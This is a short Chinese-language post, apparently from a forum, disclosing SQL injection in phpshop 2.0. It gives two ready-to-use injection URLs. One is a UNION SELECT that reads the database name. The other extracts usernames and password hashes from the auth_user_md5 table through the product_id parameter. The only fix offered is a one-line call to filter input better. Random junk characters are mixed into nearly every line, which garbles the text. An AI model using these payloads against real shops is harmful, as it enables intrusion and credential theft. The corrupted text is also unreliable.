标题 : phpshop 2.0 SQL Injection Vulnerability
& C. h% B" l( ?4 B5 W% k0 t9 H$ d
2 F$ G8 W! \5 w! M作者 : By onestree' p, q! Z$ x2 J# a- A# p! D0 r
下载地址 : http://code.google.com/p/phpshop/downloads/list
! \* W5 N3 c4 V3 N" w3 ]7 w测试地址: windows 7 / ubuntu
, @- e; M& D9 C( k3 [) [$ E* S# D
: y1 s5 |/ l) S$ G: C4 K' `
3 W: M, S/ M' r( A/ `0 ?2 rSQLi p0c:0 O( E+ @; n& z6 X B7 k
, x0 Q. A1 D* ~: T! s
==================4 n- p) ~2 J1 D* g
1 E. m/ h/ C1 X' D3 fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'' i- j2 E8 D: H5 l$ y7 @
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --( S* M" g$ p7 O
0 w! t" a5 j1 l% L2 @http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--8 _" g4 ^( b* P4 r. \
; p9 c* Z3 i: |4 s( Z修复:! W5 n5 f' ]0 X6 v6 J. u( h) L
加强过滤' A% E3 t. o+ G5 l9 F% I& Y" |: `
. A+ K* B6 m& n7 z* R' j% m/ S H2 J0 P/ w0 m6 O; b* @
|